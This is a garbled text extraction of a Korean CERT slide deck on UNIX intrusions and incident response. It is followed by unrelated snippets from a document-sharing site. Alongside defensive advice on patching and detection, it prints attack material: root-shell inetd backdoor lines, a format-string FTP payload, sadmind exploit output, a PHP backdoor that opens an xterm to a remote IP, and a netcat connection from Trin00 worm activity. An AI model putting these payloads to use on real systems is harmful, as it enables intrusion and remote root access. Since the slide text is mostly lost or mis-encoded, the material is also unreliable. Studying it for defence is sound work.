ๆญฏํ๋์คUNIX.PDF
|
|
- ์ก ๋
- 7 years ago
- Views:
Transcription
1
2
3 & Automated scan & attack / Internet Worm Ramen ADMWorm Millenium Internet Worm etc.
4 & multiple scan mscan, sscan, nmap,vetescan, sscanew,... Intruder Master Master Master / D D D D D D D D DDOS Trinoo, TFN, TFN2K, Stacheldraht, mstream,... Randomized ports Victim
5 (?) Windows Trojan BackOrifice, NetBus, Sub7, School Bus,DeepBO,...
6 Hackvisit
7 (Browers) Trojan(BO) GUI Trojan Horse (NNTP) DNS
8 1/2 <1 >,, <2 > ftpd, amountd, imap guest, anonymous,, ID <3 >root root root <4 > (Sniffer) ID,
9 2/2 <5 > (Backdoor), /etc/inetd.conf root login Trojaned telnet *KAIST <6 >,,,, <7 > < >
10 Types of Scan mscan SAINT, sscan2k, vetescan, Cgican, winscan, rpcscan : nmap, stealthscan : firewalk, nmap
11 network cert# nmap -sp *" Starting nmap V. 2.3BETA6 by Fyodor Host ( ) appears to be up. Host XXXXX.certcc.or.kr ( xxx) appears to be up. Host XXXXX.certcc.or.kr ( XXX) appears to be up. ( ) Host XXXXX.certcc.or.kr ( xxx) appears to be up. Host ( ) appears to be up. Host ( ) seems to be a subnet broadcast address (returned 26 extra pings). Skipping host. Nmap run completed IP addresses (27 hosts up) scanned in 14 seconds cert#
12 - nmap cert# nmap -I -O XXX Starting nmap V. 2.3BETA6 by Fyodor Interesting ports on XXX.certcc.or.kr ( XXX): Port State Protocol Service Owner 21 open tcp ftp 23 open tcp telnet 25 open tcp smtp 80 open tcp http 110 open tcp pop open tcp sunrpc 512 open tcp exec 1998 open tcp x25-svc-port 4045 open tcp lockd 6000 open tcp X open tcp dtspc 7100 open tcp font-service TCP Sequence Prediction: Class=random positive increments Difficulty=28995 (Worthy challenge) Remote operating system guess: Solaris Nmap run completed -- 1 IP address (1 host up) scanned in 10 seconds
13 - sscan2k sscan2k-pre6]#./sscan -o <[ * report for host violet93 * <[ tcp port: 111 (unknown) ]> <[ tcp port: 6000 (unknown) ]> <[ tcp port: 53 (domain) ]> <[ tcp port: 25 (smtp) ]> <[ tcp port: 21 (ftp) ]> <[ tcp port: 113 (auth) ]> --<[ *OS*: violet93: NMAP detected: Linux <[ *Named* Running: REL --<[ *BANNER*: Mail banner follows: 220 localhost.localdomain ESMTP Sendmail /8.11.0; Wed, 7 Feb :05: <[ * rpc services? * ]>-- <[ [prog. name -> portmapper] [port -> 111(udp)] [vers. -> 2] <[ [prog. name -> nlockmgr] [port -> 1056(udp)] [vers. -> 1] <[ [prog. name -> nlockmgr] [port -> 1056(udp)] [vers. -> 3] <[ [prog. name -> status] [port -> 1057(udp)] [vers. -> 1] <[ [prog. name -> status] [port -> 3196(tcp)] [vers. -> 1] --<[ * exports...? * ]>-- --<[ *VULN REPORT SUMMARY: violet93 --<[ *VULN*: violet93: sendmail will 'expn' accounts for us@? <[ * scan of violet93 completed
14 - vetescan vetes]#./vetescan [VetesCan]: checking for all the bitches arguments.. right on [VetesCan]: setting local script variables.. done. [VetesCan]: using nmap to detect running tcp services.. done. [VetesCan]: Lets see what OS the bitch has.. done. Done... [VetesCan]: checking for Vulnerable Services.. [VetesCan]: checking for Systat.. [VetesCan]: checking for Netstat.. [VetesCan]: checking for Authentication.. [VetesCan]: checking for ftpd.. [VetesCan]: checking for MDBMS.. [VetesCan]: checking for TCP/36864 portshell.. [VetesCan]: checking for gnapster.. [VetesCan]: checking for gdm.. [VetesCan]: checking for exec.. [VetesCan]: checking for D-Link Admin Login.. [VetesCan]: checking for Smb =-=-=-=-=-=-=-=-=V=e=t=e=S=c=a=n=-=-=-=-=-=-=-=-=-=-= Running services on : Starting nmap V. 2.3BETA15 by ( ) Interesting ports on violet93 ( ): Port State Protocol Service 21 open tcp ftp 23 open tcp telnet 53 open tcp domain 111 open tcp sunrpc 113 open tcp auth 515 open tcp printer 6000 open tcp X11 TCP Sequence Prediction: Class=random positive increments Difficulty= (Good luck!) Remote operating system guess: Linux Checking for Ftpd: [ver (Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000) ready.] Vulnerable Ftpds: docs/ftp/vuln-ftp-versions.txt checking for RPC/Statd: statd Patch: ftp://sgigate.sgi.com/patches/ Exploit: docs/statd
15 [ ] Login Name TTY Idle When Where root Super-User console 3:20 Tue 10:30 :0 chief Ha do yoon pts/5 5:38 Wed 13: cert# rpcinfo -p xxx program vers proto port tcp 111 rpcbind udp 111 rpcbind ( ) udp 1026 nlockmgr udp 1026 nlockmgr tcp 1024 nlockmgr tcp 1024 nlockmgr tcp 878 amd udp 879 amd
16 root local attack : easy remote attack : not easy rpc.statd ftpd amd sadmin named
17 Buffer Overflow copy stack return address root
18 0xbfffffb 0xbfffffb 0xbfffffb Botton of stack env.vars parameters Botton of stack env.vars parameters Botton of stack env.vars parameters stack grown buffer grown Return addr Prev.frame ptr Stack vars Stack frame 0 Return addr Prev.frame ptr Stack vars Expected location of the return addr Return addr Prev.frame ptr Stack vars frame pointer stack pointer. parameters Return addr Prev.frame ptr Buffer[96] Stack frame for main() frame pointer stack pointer. addr of the attack code Attack code Attack code Buffer overflow stack pointer Instruction pointer stack address space stack address space stack address space. addr of the attack code Attack code Attack code void void main() main() { { char char buffer[96]; Instruction buffer[96];.. pointer.. Strcpy(buffer,large_string); Strcpy(buffer,large_string); return; return; } } Instruction pointer void void main() main() { { char char buffer[96]; buffer[96];.... Strcpy(buffer,large_string); Strcpy(buffer,large_string); return; return; } } void void main() main() { { char char buffer[96]; buffer[96];.... Strcpy(buffer,large_string); Strcpy(buffer,large_string); return; return; } } executed code segment executed code segment executed code segment (a) before the attack (b) after injecting the attack code (c) execting the attack code
19 Buffer Overflow SUID
20 rpc.statd bug 1. syslog() string input ---> root - rpc.statd UNIX /etc/inetd.conf shell NFS rpc.statd - CERTCC-KR KA
21 FTPD bug 1. "Site exec" Vulnerability - wu-ftpd ftpd 2. setproctitle() Vulnerability - wu-ftpd 2.6.0, proftpd, OpenBSD (solaris ) Jul 4 17:43:25 victim ftpd[3408]: USER ftp Jul 4 17:43:25 victim ftpd[3408]: PASS [malicious shellcode] Jul 4 17:43:26 victim ftpd[3408]: ANONYMOUS FTP LOGIN FROM attacker.example.com [ ], [malicious shellcode] Jul 4 17:43:28 victim-site ftpd[3408]: SITE EXEC (lines: 0): %.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%. f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%c%c%c%.f %p Jul 4 17:43:28 victim ftpd[3408]: FTP session closed 3.
22 Linux amd Buffer Overflow amd - - am-utils amd - RedHat 6.x - - RedHat 6.x - amd
23 Linux amd Buffer Overflow [/tmp]# grep amd /var/log/messages messages.1:mar 11 05:20:50 xxx 27>Mar 11 05:20:50 amd[468]: amq requested mount of ^N 3 F^L ^W ^Z?K? 18 Jan str/bin/sh(-c)/bin/echo '2222? stream tcp nowait root /bin/sh s (^ [/tmp]# ls -l -rw-rw-rw- 1 root root 116 Mar 11 05:20 h [/tmp]# more h 2222 stream tcp nowait root /bin/sh sh -i
24 Linux amd Buffer Overflow [/tmp]# ps aux grep inetd root ? S Jan12 0:00 inetd root ? S Mar11 0:00 inetd -s /tmp/h [root@alzza6 ~]# netstat -a grep 2222 tcp 0 0 *:2222 *:* LISTEN
25 Linux amd Buffer Overflow $ telnet xxx.xxx.xxx.xxx 2222 Trying xxx.xxx.xxx.xxx... Connected to xxx.xxx.xxx.xxx. Escape character is '^]'. bash# id id uid=0(root) gid=0(root) groups=0(root) bash#
26 Linux amd Buffer Overflow - 1- Intel: ftp://updates.redhat.com/6.0/i386/am-utils-6.0.1s i386.rpm Alpha: ftp://updates.redhat.com/6.0/alpha/am-utils-6.0.1s alpha.rpm SPARC: ftp://updates.redhat.com/6.0/sparc/am-utils-6.0.1s sparc.rpm Source: ftp://updates.redhat.com/6.0/srpms/am-utils-6.0.1s src.rpm Architecture neutral: ftp://updates.redhat.com/6.0/noarch/ # rpm -Uvh " # /etc/rc.d/init.d/amd restart
27 Linux amd Buffer Overflow - 2- amd # ps ax grep amd 444? S 0:00 /usr/sbin/amd -a /.automount -l syslog -c 1000 /net # killall -9 amd
28 Linux amd Buffer Overflow - 2- amd run level # chkconfig --list amd amd 0:off 1:off 2:off 3:on 4:on 5:on 6:off # chkconfig --level amd off # chkconfig --list amd amd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
29 sadmind Buffer Overflow Sadmind - Solaris :Sun Solstice Adminsuite - Solaris 2.5, 2.6, 2.7 /usr/sbin - remote - request, inetd daemon
30 sadmind Buffer Overflow Sadmind - sadmind stack - sadmind root - remote root - offset ~
31 sadmind Buffer Overflow cert# sadmindex -h s [offset] %sp 0xefff9580 offset > return address 0xefff9838 [4] %sp 0xefff9580 with frame length > %fp 0xefffa850 clnt_call: RPC: Timed out now check if exploit worked; RPC failure was expected cert# telnet Trying Connected to Escape character is '^]'. # id; uid=0(root) gid=0(root)
32 sadmind Buffer Overflow ( ) # ls -al /tmp/bob -rw-rw-rw- 1 root root 48 Jun 7 15:34 /tmp/bob # cat /tmp/bob ingreslock stream tcp nowait root /bin/sh sh -i # ps -ef. root :19:07? 0:00 /usr/sbin/inetd -s /tmp/bob. # netstat -a Local Address Remote Address Swind Send-Q Rwind Recv-Q State *.ingreslock *.* LISTEN
33 sadmind Buffer Overflow /var/adm/messages Apr 12 06:43:34 xxxx inetd[138]: /usr/sbin/sadmind: Bus Error - core dumped Apr 12 06:43:36 xxxx inetd[138]: /usr/sbin/sadmind: Segmentation Fault - core dumped Apr 12 06:43:39 xxxx inetd[138]: /usr/sbin/sadmind: Bus Error - core dumped Apr 12 06:43:41 xxxx inetd[138]: /usr/sbin/sadmind: Segmentation Fault - core dumped Apr 12 06:43:44 xxxx inetd[138]: /usr/sbin/sadmind: Hangup
34 sadmind Buffer Overflow /etc/inetd.conf, ( # ) /10 tli rpc/udp wait root /usr/sbin/sadmind sadmind sadmind ( : /opt/sunwadm/bin/admuseradd ) /10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -S 2
35 sadmind Buffer Overflow - OS Version Patch ID SunOS SunOS 5.7_x SunOS SunOS 5.6_x SunOS SunOS 5.5.1_x SunOS SunOS 5.5_x AdminSuite Version Patch ID (see Note) 2.3_x (see Note)
36 DNS : named, : resolver TCP, UDP port 53 port - DNS
37 DNS - - Inverse Query - inverse query request - root - BIND 8(/etc/named.conf ) fake-iquery no; - BIND 4.9(/etc/named.boot ) options fake-iquery, conf/options.h INVQ
38 DNS - - Inverse Query /var/named/admrocks empty /etc/inetd.conf 2222 port back door 2222 stream tcp nowait root /bin/sh sh -i
39 NXT NXT Regular Record DNS - - owner name zone name zone signed
40 NXT DNS BIND 8.2, 8.2 p1, NXT validate - NXT - buffer overflow code - named - BIND BIND 4.x
41 NXT DNS - - ADM named 8.2/8.2.1 NXT remote overflow exploit 1999 exploit root /tmp/bob ingreslock stream tcp nowait root /bin/sh sh -i /usr/sbin/inetd -s /tmp/bob;/bin/rm -f /tmp/bob /var/named/admrocks empty directory / var/named/o
42 DNS DNS off /etc/rc.d/init.d/named stop chmod -x /etc/rc.d/init.d/named bind - bind 4.9.7, p5 - : Solaris 7 Solaris 7 (SPARC) Solaris 7 (Intel) RedHat Linux 6.x ( )
43 Back door / backdoor 1. bindshell - daemon shell 2. inetd - trojan remote access 3. tcpd - hide connection, avoid deny 4. Rshd - trojan remote access 5. chfn, chsh - user root 6. crontab - cron 7. du - hide file size 8. find - hide file 9. ls - hide file 10. ifconfig - hide sniffing (hide promiscuous mode interface)
44 Back door / backdoor 11. killall - kill 12. sniffer - packet sniffer 13. sniffchk - sniffer 14. login - trojan remote access 15. netstat - hide connection, hide listening port 16. passwd - user root 17. pidof - hide process (linux) 18. ps - sniffer, backdoor daemon 19. wted - wtmp / utmp 20. syslogd - hide log 21. top - sniffer, backdoor daemon
45 Back door bindshell /08/12 3.2/4.3NFSSRC # Internet server configuration database ftp stream tcp nowait root /usr/etc/ftpd ftpd telnet stream tcp nowait root /usr/etc/telnetd telnetd shell stream tcp nowait root /usr/etc/rshd rshd 2222 stream tcp nowait root /bin/sh sh -i
46 shell backdoor scan scanning 3. tcp 1524, 2222, 9704 scan scanner#./synscan infile outfile eth ,2222,9704 SynScan 1.6 by psychoid/tcl scanner# cat outfile 203.*** (203.*** ):1524 :# 202.*** (202.***.78.98):1524 :bash# 202.*** (202.***.13.81):2222 :bash# cf PC outfile.
47 Rootkit,, backdoor Rootkit /dev. (ls ls ). (ex. /usr/src/linux/arch/alpha/lib) find /dev -type f -print
48 Rootkit rootkit lrk 4,5 warchild rootkit (solaris, linux),knork Rootkit. (ex. ac.kr scanning) scanning Denial of service..
49 Sniffing ID telnet, pop, www ID esniff, solsniff, linsniff, sniffit, tcpdump, snoop, WWW Sniff
50 Sniffing promiscuous mode : sniffing. :CPM, neped Secure Shell (SSH), VPN tcp session.
51
52 Event Attack Incident : Hackers, Spies, Terrorists, Corporate raider, Professional Criminals, Vandals, Voyeurs : Physical Attack, Information Exchange, User command, Script/Program, Autonomous agent, Toolkit, Distributed tool, Data trap : Design, Implementation, Configuration : Probe, Scan, Flood, Authenticate, Bypass, Spoof, Read, Copy, Steal, Modify, Delete : Account, Process, Data, Component, Computer, Network, Internet work : Increased Access, Disclosure of Information, Corruption of Information, Denial of Service, Theft of Resources : Challenge Status/Thrill, Political Gain, Financial Gain, Damage
53 (Denial Of Service) TCP DOS DOS
54 Distributed DOS Attack Trin00 Attack 27665/tcp Intruder M-> D : 27444/udp D->M : 31335/udp Master Master Master D D D D D D D D Randomized ports Victim
55 Trin00 Attack Communication Network Master Daemon Agent Daemon Hello telnet xxx.xxx.xxx. xxx password trinoo > Trinoo > attack IP- Addr password attack IP- addr Broadcast PONG Attack (UDP Flooding)
56 Stacheldraht Attack Communication Network 65000/tcp or ICMP ECHO_REPLY ICMP ECHO_REPLY agent 16660/tcp ( ) master TCP SYN, UDP flood ICMP flood, Smurf Internet Attacker master handler client
57 Distributed DOS Attack Trin00 ( ) : Trin00 rpc./trin.sh nc xxx.xxx.xxx.xxx 1524 WORM trin00
58 Distributed DOS Attack Trin00 trin00 master Deamon # nmap -PI -st -p m 2766.log xxx.xxx.xxx # nmap -PI -su -p m log xxx.xxx.xxx # nmap -PI -su -p m log xxx.xxx.xxx rpc # nmap -PI -st -p m 1524.log xxx.xxx.xxx ) Host: xxx.xxx.xxx.21 () Status: Up Host: xxx.xxx.xxx.22 () Ports: 31335/open/udp///// Host: xxx.xxx.xxx.28 () Ports: 31335/open/udp///// Host: xxx.xxx.xxx.29 () Ports: 31335/open/udp/////
59 Distributed DOS Attack Trin00 : trin00 : tserver1900, deamon : tsolnmb, ns, httpd, rpc.trinoo, rpc.listen, trinix, rpc.irix, irix cron table * * * * /dev/isdn/.subsys/tsolnmb > /dev/null 2>&1 netstat *:31335 Idle (UDP) *:27444 Idle (UDP) *:27665 *:*... Listen (TCP)
60 Distributed DOS Attack Trin00 Secure Your Host 31335(UDP), 27444(UDP), 27665(TCP) DOS Trin00 National Infrastructure Protection Center Trin00 CERTCC-KR,
61 Distributed DOS Attack Trin00 daemon strings master master CERTCC-KR daemon binary master master daemon IP CERTCC-KR CERTCC-KR daemon host trin00 CERTCC-KR
62 Distributed DOS Attack Trin00 CERTCC-KR Trin00 ISP Trin00? Trin00 /
63 PHP 1. / php <? system( "/usr/bin/x11/xterm -display < IP>:0.0" );?> 4. PHP CGI.php.php3.cgi SSI( Server Side Interpreter ) --> nobody
64 PHP 5. - PHP, - -,.php.php3 cgi - CERTCC-KR KA
65 - -
66 - -
67 - -
68 - - /usr/sbin/pwconv, pwunconv crack passwd+, npasswd, anlpasswd -n : -x : -w : /etc/default/passwd PASSLENGTH
69 - - Linux Red Hat : SUNOS : show.pl?target=patches/patch-access HPUX : IBM AIX : ftp://aix.software.ibm.com/aix/efixes/security/ NOVELL : ftp://ftp.novell.com SCO : ftp://ftp.sco.com SGI : ftp://ftp.sgi.com/security/sgi
70 - - UNIX Utmp Acces s_log mess ages News log Su log Secur e log wtmp SPAM relay Popd O O Spool er log Sys log Imapd O O Named O Innd O O Identd O Phf CGI O Portscan Mscan O O O su O O login O O O O ftp O O O O O
71 Q & A
PowerPoint ํ๋ ์ ํ ์ด์
(Host) set up : Linux Backend RS-232, Ethernet, parallel(jtag) Host terminal Target terminal : monitor (Minicom) JTAG Cross compiler Boot loader Pentium Redhat 9.0 Serial port Serial cross cable Ethernet
More information2-11รรฅ
Chapter 11 script kiddies.... 24.., script kiddies..,... 215 1 TCP/IP., TCP/IP. IP IP..,. IP. TCP/IP TCP( UDP).. 0 65535.., IP, IP,,. (, ). 216 Chapter 11 IP. IP.... 1024 (0 1023 ).... A B. B IP, A. IP,
More information*****
Korea Internet & Security Agency 21 2 ๋ณธ ๋ณด๊ณ ์ ๋ด์ฉ์ ์ ๋ถ๋ ์ผ๋ถ๋ฅผ ์ธ์ฉํ๋ ๊ฒฝ์ฐ์๋ ๋ฐ๋์ ์ถ์ฒ [์๋ฃ:ํ๊ตญ์ธํฐ๋ท์งํฅ์ ์ธํฐ๋ท์นจํด๋์์ผํฐ]๋ฅผ ๋ช ์ํ์ฌ ์ฃผ์๊ธฐ ๋ฐ๋๋๋ค. CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 34 37 38 1 212 Bot
More information<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>
i ii iii iv v vi 1 2 3 4 ๊ฐ์๋ํ ์์คํ ์ ๊ตญ๋ด์ธ ํํฉ ์กฐ์ฌ ๊ฐ์๋ํ ํ๋ซํผ ๊ฐ๋ฐ ์ด์์ ์ธ ๊ฐ์๋ํ์์คํ ์ ๋ฏธ๋์ ์ ์ 5 ์น-๊ธฐ๋ฐ ๊ฐ์๋ํ ์์คํ ์ ํต์ ์ธ ๊ต์ ๋ฐฉ๋ฒ ์๊ฐ/๊ณต๊ฐ ์ ์ฝ์ ๊ทน๋ณตํ ํ์ต๋๊ธฐ ๋ถ์ฌ ๊ต์์ ์ผ๋ฐฉ์ ์ธ ๋ด์ฉ์ ๋ฌ ๊ต์์ ํ์๊ฐ์ ์ํธ์์ฉ ๋๋ฃ ํ์๋ค ๊ฐ์ ์ํธ์์ฉ ๊ฐ์๋ํ ์ด์ ๊ณต์ง์ฌํญ,๊ฐ์๋ก ์๋ฃ์ค, ๋ฉ๋ชจ ์ง์์๋ต,
More informationรรร รยณร รรธรรฏยฟรธ 3ยฟรน รรบรรยปรณ
Korea Internet & Security Agency 21 3 CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 31 34 35 1 213 Bot 1,85 1,32 16.7 1,53 1,76 12.1 222 317 3. 116 16 9.4% 345 23 5.% 267 233 14.6%
More informationรรร รยณร รรธรรฏยฟรธ 5ยฟรน
21 5 Korea Internet & Security Agency CONTENTS 2 3 3 3 4 4 5 6 6 7 7 8 11 12 14 14 15 15 16 18 2 22 23 24 24 32 35 36 2 215 Bot 1,7511,315 33.2% 1,621,468 27.7% 285 431 33.9% 295 12 6.9% 44 396 2.% 132
More information1217 WebTrafMon II
(1/28) (2/28) (10 Mbps ) Video, Audio. (3/28) 10 ~ 15 ( : telnet, ftp ),, (4/28) UDP/TCP (5/28) centralized environment packet header information analysis network traffic data, capture presentation network
More informationNetwork seminar.key
Intro to Network .. 2 4 ( ) ( ). ?!? ~! This is ~ ( ) /,,,???? TCP/IP Application Layer Transfer Layer Internet Layer Data Link Layer Physical Layer OSI 7 TCP/IP Application Layer Transfer Layer 3 4 Network
More informationUDP Flooding Attack ๊ณต๊ฒฉ๊ณผ ๋ฐฉ์ด
ํฉ ๊ต ๊ตญ (fullc0de@gmail.com) SK Infosec Co., Inc MSS Biz. Security Center Table of Contents 1. ์๊ฐ...3 2. ๊ณต๊ฒฉ ๊ด๋ จ Protocols Overview...3 2.1. UDP Protocol...3 2.2. ICMP Protocol...4 3. UDP Flood Test Environment...5
More information*
Korea Internet & Security Agency 29 12 CONTENTS 1 3 4 5 6 6 7 9 1 13 14 16 18 23 56 59 61 Windows XP SP1 Windows 2 SP4 1 2912 Bot 326 49 2.3 73 73 239 215 11.2% 256 199 28.6% 25 115 117.4% Bot 8,469 46
More informationSubnet Address Internet Network G Network Network class B networ
Structure of TCP/IP Internet Internet gateway (router) Internet Address Class A Class B Class C 0 8 31 0 netid hostid 0 16 31 1 0 netid hostid 0 24 31 1 1 0 netid hostid Network Address : (A) 1 ~ 127,
More informationแแ ฆ20แแ ฌ_แแ ขแแ ตแผแแ กแผแแ ตแแ ฏแแ ณแแ ฃแธ_(แแ ตแแ ขแแ ฅแจ)
IoT DDoS DNS (jaeseog@sherpain.net) (www.sherpain.net) DDoS DNS DDoS / DDoS(Distributed DoS)? B Asia Broadband B Bots connect to a C&C to create an overlay network (botnet) C&C Provider JP Corp. Bye Bye!
More informationSMB_ICMP_UDP(huichang).PDF
SMB(Server Message Block) UDP(User Datagram Protocol) ICMP(Internet Control Message Protocol) SMB (Server Message Block) SMB? : Microsoft IBM, Intel,. Unix NFS. SMB client/server. Client server request
More informationTCP.IP.ppt
TCP/IP TCP/IP TCP/IP TCP/IP TCP/IP Internet Protocol _ IP Address Internet Protocol _ Subnet Mask Internet Protocol _ ARP(Address Resolution Protocol) Internet Protocol _ RARP(Reverse Address Resolution
More informationBackup Exec
(sjin.kim@veritas.com) www.veritas veritas.co..co.kr ? 24 X 7 X 365 Global Data Access.. 100% Storage Used Terabytes 9 8 7 6 5 4 3 2 1 0 2000 2001 2002 2003 IDC (TB) 93%. 199693,000 TB 2000831,000 TB.
More informationbn2019_2
arp -a Packet Logging/Editing Decode Buffer Capture Driver Logging: permanent storage of packets for offline analysis Decode: packets must be decoded to human readable form. Buffer: packets must temporarily
More informationPowerPoint ํ๋ ์ ํ ์ด์
Reasons for Poor Performance Programs 60% Design 20% System 2.5% Database 17.5% Source: ORACLE Performance Tuning 1 SMS TOOL DBA Monitoring TOOL Administration TOOL Performance Insight Backup SQL TUNING
More information6์ฃผ์ฐจ.key
6, Process concept A program in execution Program code PCB (process control block) Program counter, registers, etc. Stack Heap Data section => global variable Process in memory Process state New Running
More informationLXR ์ค์น ๋ฐ ์ฌ์ฉ๋ฒ.doc
Installation of LXR (Linux Cross-Reference) for Source Code Reference Code Reference LXR : 2002512( ), : 1/1 1 3 2 LXR 3 21 LXR 3 22 LXR 221 LXR 3 222 LXR 3 3 23 LXR lxrconf 4 24 241 httpdconf 6 242 htaccess
More informationo o o 8.2.1. Host Error 8.2.2. Message Error 8.2.3. Recipient Error 8.2.4. Error 8.2.5. Host 8.5.1. Rule 8.5.2. Error 8.5.3. Retry Rule 8.11.1. Intermittently
More information๋ค. ์ต์ ๋ฒ์ ์ rpm ํจํค์ง ๋ฒ์ ์ ๋ค์ด๋ก๋ํด ๋ค์๊ณผ ๊ฐ์ด ์ค ์นํ๋ค. ๋จ debuginfo์ rpm ํจํค์ง๋ ์ค์นํ ํ์๊ฐ ์๋ค. ํ๊ธฐ ์ํ ์ต์ ์ด๊ณ , init๋ ์ ์ฅ์๋ฅผ ์ด๊ธฐํํ๊ธฐ ์ํ cvs ๋ช ๋ น ์ด์ด๋ค. - ์๋ก ์ค์นํ ๊ฒฝ์ฐ : rpm -ivh cvs* -
๊ฐ๋ฐ์๋ฅผ ์ํ ๋ฆฌ๋ ์ค ์ ํธ๋ฆฌํฐ ํ์ฉ๋ฒ CVS๋ฅผ ์ด์ฉํ ํ๋ก์ ํธ ๊ด๋ฆฌ ์ฐ์ฌ์ ๋ง์ง๋ง ์๊ฐ์๋ ๋ฆฌ๋ ์ค์ ์์ค ๋ฒ์ ๊ด๋ฆฌ๋ฅผ ์ํ ํด์ ์๊ฐํ๋ค. ์ด ํด์ ํํ ํ์ ๊ด๋ฆฌ ์์คํ , ๋ฒ์ ๊ด๋ฆฌ ์์คํ ์ด๋ผ๊ณ ์ผ์ปฌ์ด์ง๋ค. ์๋์ฐ๋ ๋ฆฌ๋ ์ค ์์คํ ํ๊ฒฝ์๋ ์ฌ๋ฌ ๊ฐ์ง ํ์ ๊ด ๋ฆฌ ์์คํ ์ด ์กด์ฌํ๋๋ฐ ์ฌ๊ธฐ์๋ ํ์ฌ ์คํ์์ค๋ก ๋๋ฆฌ ์๋ ค์ง CVS์ ๋ํด ์ดํด๋ณธ๋ค. 4 ์ฐ ์ฌ ์
More information์นจ์ ๋ฐฉ์ง์๋ฃจ์ ๋์ ๊ฒํ ๋ณด๊ณ ์
IT 2005. 06. 02. IT IT Windows 3503 4463 4178 64% Solaris 142 56 36 Digital UX 37 24 9 Tru64 30 20 26 Server & DeskTop UNIX HP-UX 27 IRIX 19 FreeBSD 12 7 15 8 5 17 9 2% AIX 5 3 3 Linux 348 400 516 8% Apple
More information์๊ฐ TeraStation ์ ๊ตฌ์ ํด ์ฃผ์ ์ ๊ฐ์ฌํฉ๋๋ค! ์ด ์ฌ์ฉ ์ค๋ช ์๋ TeraStation ๊ตฌ์ฑ ์ ๋ณด๋ฅผ ์ ๊ณตํฉ๋๋ค. ์ ํ์ ๊ณ์ ์ ๋ฐ์ดํธ๋๋ฏ๋ก, ์ด ์ค๋ช ์์ ์ด๋ฏธ์ง ๋ฐ ํ ์คํธ๋ ์ฌ์ฉ์๊ฐ ๋ณด์ ์ค์ธ TeraStation ์ ํ์ ๋ ์ด๋ฏธ์ง ๋ฐ ํ ์คํธ์ ์ฝ๊ฐ ๋ค๋ฅผ ์
์ฌ์ฉ ์ค๋ช ์ TeraStation Pro II TS-HTGL/R5 ํจํค์ง ๋ด์ฉ๋ฌผ: ๋ณธ์ฒด (TeraStation) ์ด๋๋ท ์ผ์ด๋ธ ์ ์ ์ผ์ด๋ธ TeraNavigator ์ค์น CD ์ฌ์ฉ ์ค๋ช ์ (์ด ์ค๋ช ์) ์ ํ ๋ณด์ฆ์ www.buffalotech.com ์๊ฐ TeraStation ์ ๊ตฌ์ ํด ์ฃผ์ ์ ๊ฐ์ฌํฉ๋๋ค! ์ด ์ฌ์ฉ ์ค๋ช ์๋ TeraStation ๊ตฌ์ฑ ์ ๋ณด๋ฅผ
More informationSRC PLUS ์ ์ด๊ธฐ MANUAL
,,,, DE FIN E I N T R E A L L O C E N D SU B E N D S U B M O TIO
More informationCodegate์ธ hacking๋ํ ์ค์์..
Codegate ์ธ hacking ๋ํ์ค์์.. Historymaker ์๊ฐ๊ธ Codegate ์ธ hacking ๋ํ์ค ์ทจ์ฝ์ ์ผ๋ถ๋ด์ฉ ๋ชฉ์ฐจ 1 4 2012.06.15 20:06 - - =========================================================================================== Thank
More informationUSB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl C
USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC Step 1~5. Step, PC, DVR Step 1. Cable Step
More informationPCServerMgmt7
Web Windows NT/2000 Server DP&NM Lab 1 Contents 2 Windows NT Service Provider Management Application Web UI 3 . PC,, Client/Server Network 4 (1),,, PC Mainframe PC Backbone Server TCP/IP DCS PLC Network
More informationuntitled
Push... 2 Push... 4 Push... 5 Push... 13 Push... 15 1 FORCS Co., LTD A Leader of Enterprise e-business Solution Push (Daemon ), Push Push Observer. Push., Observer. Session. Thread Thread. Observer ID.
More information๋ณธ๋ฌธ์๋ ์ด๊ธ์๋ค์ ๋์์ผ๋ก ์ต๋ํ ์ฝ๊ฒ ์์ฑํ์์ต๋๋ค. ๋ณธ๋ฌธ์์์๋ ์ค์น๋ฐฉ๋ฒ๋ง ๊ธฐ์ ํ์ผ๋ฉฐ ์์ธํ ์ค์ ๋ฐฉ๋ฒ์ ๊ฒ์์ ํตํ์๊ธฐ ๋ฐ๋๋๋ค. 1. ์ค์น๊ฐ์ ์๋ํ๋ ์ค๋ ๋ธ๋ก๊ทธ ํํ์ ํํ์ด์ง๋ฅผ ๋น ๋ฅด๊ฒ ๋ง๋ค์ ์๊ฒ ํด ์ฃผ๋ ํ๋ก๊ทธ๋จ์ ๋๋ค. ๋ค์ํ ๊ธฐ๋ฅ์ ํ๋ ํ๋ฌ๊ทธ์ธ๊ณผ ๋์์ธ
์ค๋ง์ผ์๋ธ CLOUD_Virtual ์๋ํ๋ ์ค ์ค์น (WORDPRESS INSTALL) ์ค๋ง์ผ์๋ธ ๊ฐ์ํ์ฌ์ ๋ณธ๋ถ Update. 2012. 09. 04. ๋ณธ๋ฌธ์๋ ์ด๊ธ์๋ค์ ๋์์ผ๋ก ์ต๋ํ ์ฝ๊ฒ ์์ฑํ์์ต๋๋ค. ๋ณธ๋ฌธ์์์๋ ์ค์น๋ฐฉ๋ฒ๋ง ๊ธฐ์ ํ์ผ๋ฉฐ ์์ธํ ์ค์ ๋ฐฉ๋ฒ์ ๊ฒ์์ ํตํ์๊ธฐ ๋ฐ๋๋๋ค. 1. ์ค์น๊ฐ์ ์๋ํ๋ ์ค๋ ๋ธ๋ก๊ทธ ํํ์ ํํ์ด์ง๋ฅผ ๋น ๋ฅด๊ฒ ๋ง๋ค์ ์๊ฒ
